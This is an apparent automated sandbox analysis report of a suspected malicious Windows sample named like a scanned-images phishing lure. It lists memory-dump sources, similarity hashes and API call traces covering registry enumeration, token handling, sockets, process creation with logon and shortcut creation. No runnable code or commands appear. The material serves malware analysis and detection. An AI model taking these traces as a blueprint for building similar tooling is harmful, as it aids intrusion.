Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 7ca5fa83e7afa85ba399f1bc50ab601d493b45f6ba88ec743b73f90b6a7c4d8d
• Instruction ID: dac5f879e01fc21a8bd30cb6fc73f197b3f1cb23fce21c13fcb69a8b085ac7ef
• Opcode Fuzzy Hash: 7ca5fa83e7afa85ba399f1bc50ab601d493b45f6ba88ec743b73f90b6a7c4d8d
• Instruction Fuzzy Hash: 3B219139600315DBDB608F698C44F9A77A4AF85720F200A1EECA1E72E0D7749861CB18
APIs
  • Part of subcall function 0045600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0045604C
  • Part of subcall function 0045600E: GetStockObject.GDI32(00000011), ref: 00456060
  • Part of subcall function 0045600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0045606A
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004E4112
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004E411F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004E412A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004E4139
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004E4145
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 9961f775eecc48b07899ad583b84faa82997479c8f0a1f8bf4fc577b51235860
• Instruction ID: edcf3fac97081afce0a4c3c16b4f557614f5f719c062c48d6a888c94180ae6ca
• Opcode Fuzzy Hash: 9961f775eecc48b07899ad583b84faa82997479c8f0a1f8bf4fc577b51235860
• Instruction Fuzzy Hash: 4F11E6B114021D7EEF108F65CC85EE77F5DEF08798F014111BA18A2150C6769C21DBA4
APIs
  • Part of subcall function 0048D7A3: _free.LIBCMT ref: 0048D7CC
• _free.LIBCMT ref: 0048D82D
  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
• _free.LIBCMT ref: 0048D838
• _free.LIBCMT ref: 0048D843
• _free.LIBCMT ref: 0048D897
• _free.LIBCMT ref: 0048D8A2
• _free.LIBCMT ref: 0048D8AD
• _free.LIBCMT ref: 0048D8B8
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
• Instruction ID: 7c7e8a1ceae6a3a0d87c3874ad26187ca8b1c9d2c9d493479c286c1155fa1f23
• Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
• Instruction Fuzzy Hash: FD112CB1A42B04AAD521BFB2CC46FCF7B9C6F00704F400C2AF299A60D2DA6DA5454754
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004BDA74
• LoadStringW.USER32(00000000), ref: 004BDA7B
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004BDA91
• LoadStringW.USER32(00000000), ref: 004BDA98
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004BDADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 004BDAB9
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
• Opcode ID: 50fd440276859624572946bf6def81670feb3a17f07f964db1e6dcfb23b712b7
• Instruction ID: b5911536b8d173fe29ff5293361178925c2714c6f735d5d3b7f2b2d5b19a2a74
• Opcode Fuzzy Hash: 50fd440276859624572946bf6def81670feb3a17f07f964db1e6dcfb23b712b7
• Instruction Fuzzy Hash: E90186F2900348BFEB109BE09DC9EE7776CEB08301F4445A6B716E6042E6749E858F78
APIs
• InterlockedExchange.KERNEL32(0128EF40,0128EF40), ref: 004C097B
• EnterCriticalSection.KERNEL32(0128EF20,00000000), ref: 004C098D
• TerminateThread.KERNEL32(006F0074,000001F6), ref: 004C099B
• WaitForSingleObject.KERNEL32(006F0074,000003E8), ref: 004C09A9
• CloseHandle.KERNEL32(006F0074), ref: 004C09B8
• InterlockedExchange.KERNEL32(0128EF40,000001F6), ref: 004C09C8
• LeaveCriticalSection.KERNEL32(0128EF20), ref: 004C09CF
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 33733ac389d4b4e601578230328d25c8380d2cdd81ac3057fb6e63f154bfed1b
• Instruction ID: bf133f818181e7c6cfd7257182ec2385ce444c541e165d1630a81422323dc8fc
• Opcode Fuzzy Hash: 33733ac389d4b4e601578230328d25c8380d2cdd81ac3057fb6e63f154bfed1b
• Instruction Fuzzy Hash: F4F03171842642FBD7415F94EECCBD6BB39FF01702F401426F201588A2C7749466CF98
APIs
• GetClientRect.USER32(?,?), ref: 00455D30
• GetWindowRect.USER32(?,?), ref: 00455D71
• ScreenToClient.USER32(?,?), ref: 00455D99
• GetClientRect.USER32(?,?), ref: 00455ED7
• GetWindowRect.USER32(?,?), ref: 00455EF8
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: b8f5c67d2a04c9fa98a0591e30f0ebcff7b6cf2971253cdffdc4b6cb6af268f0
• Instruction ID: 71101542cc2f99033f3d0572dd109bd84f873eb417c301cc9a586ce466e8820f
• Opcode Fuzzy Hash: b8f5c67d2a04c9fa98a0591e30f0ebcff7b6cf2971253cdffdc4b6cb6af268f0
• Instruction Fuzzy Hash: DEB17B75A0064ADBDB10CFA8C481AFEBBF1FF44311F14841AE8A9D7250D738AA56CB58
APIs
• __allrem.LIBCMT ref: 004800BA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004800D6
• __allrem.LIBCMT ref: 004800ED
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0048010B
• __allrem.LIBCMT ref: 00480122
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00480140
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                APIs
                                                                                  • Part of subcall function 004D3149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,004D101C,00000000,?,?,00000000), ref: 004D3195
                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 004D1DC0
                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004D1DE1
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1DF2
                                                                                • inet_ntoa.WSOCK32(?), ref: 004D1E8C
                                                                                • htons.WSOCK32(?,?,?,?,?), ref: 004D1EDB
                                                                                • _strlen.LIBCMT ref: 004D1F35
                                                                                  • Part of subcall function 004B39E8: _strlen.LIBCMT ref: 004B39F2
                                                                                  • Part of subcall function 00456D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0046CF58,?,?,?), ref: 00456DBA
                                                                                  • Part of subcall function 00456D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0046CF58,?,?,?), ref: 00456DED
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                • String ID:
                                                                                • API String ID: 1923757996-0
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004782D9,004782D9,?,?,?,0048644F,00000001,00000001,8BE85006), ref: 00486258
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0048644F,00000001,00000001,8BE85006,?,?,?), ref: 004862DE
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004863D8
                                                                                • __freea.LIBCMT ref: 004863E5
                                                                                  • Part of subcall function 00483820: RtlAllocateHeap.NTDLL(00000000,?,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6,?,00451129), ref: 00483852
                                                                                • __freea.LIBCMT ref: 004863EE
                                                                                • __freea.LIBCMT ref: 00486413
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1414292761-0
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004DB6AE,?,?), ref: 004DC9B5
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DC9F1
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA68
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA9E
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004DBCCA
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004DBD25
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004DBD6A
                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004DBD99
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004DBDF3
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004DBDFF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                • String ID:
                                                                                • API String ID: 1120388591-0
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(00000035), ref: 004AF7B9
                                                                                • SysAllocString.OLEAUT32(00000001), ref: 004AF860
                                                                                • VariantCopy.OLEAUT32(004AFA64,00000000), ref: 004AF889
                                                                                • VariantClear.OLEAUT32(004AFA64), ref: 004AF8AD
                                                                                • VariantCopy.OLEAUT32(004AFA64,00000000), ref: 004AF8B1
                                                                                • VariantClear.OLEAUT32(?), ref: 004AF8BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCopy$AllocInitString
                                                                                • String ID:
                                                                                • API String ID: 3859894641-0
                                                                                APIs
                                                                                  • Part of subcall function 00457620: _wcslen.LIBCMT ref: 00457625
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 004C94E5
                                                                                • _wcslen.LIBCMT ref: 004C9506
                                                                                • _wcslen.LIBCMT ref: 004C952D
                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 004C9585
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$FileName$OpenSave
                                                                                • String ID: X
                                                                                • API String ID: 83654149-3081909835
                                                                                APIs
                                                                                  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
                                                                                • BeginPaint.USER32(?,?,?), ref: 00469241
                                                                                • GetWindowRect.USER32(?,?), ref: 004692A5
                                                                                • ScreenToClient.USER32(?,?), ref: 004692C2
                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004692D3
                                                                                • EndPaint.USER32(?,?,?,?,?), ref: 00469321
                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004A71EA
                                                                                  • Part of subcall function 00469339: BeginPath.GDI32(00000000), ref: 00469357
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                • String ID:
                                                                                • API String ID: 3050599898-0
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 004C080C
                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 004C0847
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 004C0863
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 004C08DC
                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004C08F3
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 004C0921
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3368777196-0
                                                                                APIs
                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,004AF3AB,00000000,?,?,00000000,?,004A682C,00000004,00000000,00000000), ref: 004E824C
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004E8272
                                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 004E82D1
                                                                                • ShowWindow.USER32(00000000,00000004), ref: 004E82E5
                                                                                • EnableWindow.USER32(00000000,00000001), ref: 004E830B
                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004E832F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 642888154-0
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 004B4C95
                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004B4CB2
                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004B4CEA
                                                                                • _wcslen.LIBCMT ref: 004B4D08
                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004B4D10
                                                                                • _wcsstr.LIBVCRUNTIME ref: 004B4D1A
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
• String ID:
• API String ID: 72514467-0

APIs
  • Part of subcall function 00453AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00453A97,?,?,00452E7F,?,?,?,00000000), ref: 00453AC2
• _wcslen.LIBCMT ref: 004C587B
• CoInitialize.OLE32(00000000), ref: 004C5995
• CoCreateInstance.OLE32(004EFCF8,00000000,00000001,004EFB68,?), ref: 004C59AE
• CoUninitialize.OLE32 ref: 004C59CC
Strings
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
• String ID: .lnk
• API String ID: 3172280962-24824748

APIs
  • Part of subcall function 004B0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004B0FCA
  • Part of subcall function 004B0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004B0FD6
  • Part of subcall function 004B0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004B0FE5
  • Part of subcall function 004B0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004B0FEC
  • Part of subcall function 004B0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004B1002
• GetLengthSid.ADVAPI32(?,00000000,004B1335), ref: 004B17AE
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 004B17BA
• HeapAlloc.KERNEL32(00000000), ref: 004B17C1
• CopySid.ADVAPI32(00000000,00000000,?), ref: 004B17DA
• GetProcessHeap.KERNEL32(00000000,00000000,004B1335), ref: 004B17EE
• HeapFree.KERNEL32(00000000), ref: 004B17F5
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0

APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004B14FF
• OpenProcessToken.ADVAPI32(00000000), ref: 004B1506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004B1515
• CloseHandle.KERNEL32(00000004), ref: 004B1520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004B154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 004B1563
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0

APIs
• GetLastError.KERNEL32(?,?,00473379,00472FE5), ref: 00473390
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0047339E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004733B7
• SetLastError.KERNEL32(00000000,?,00473379,00472FE5), ref: 00473409
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0

APIs
• GetLastError.KERNEL32(?,?,00485686,00493CD6,?,00000000,?,00485B6A,?,?,?,?,?,0047E6D1,?,00518A48), ref: 00482D78
• _free.LIBCMT ref: 00482DAB
• _free.LIBCMT ref: 00482DD3
• SetLastError.KERNEL32(00000000,?,?,?,?,0047E6D1,?,00518A48,00000010,00454F4A,?,?,00000000,00493CD6), ref: 00482DE0
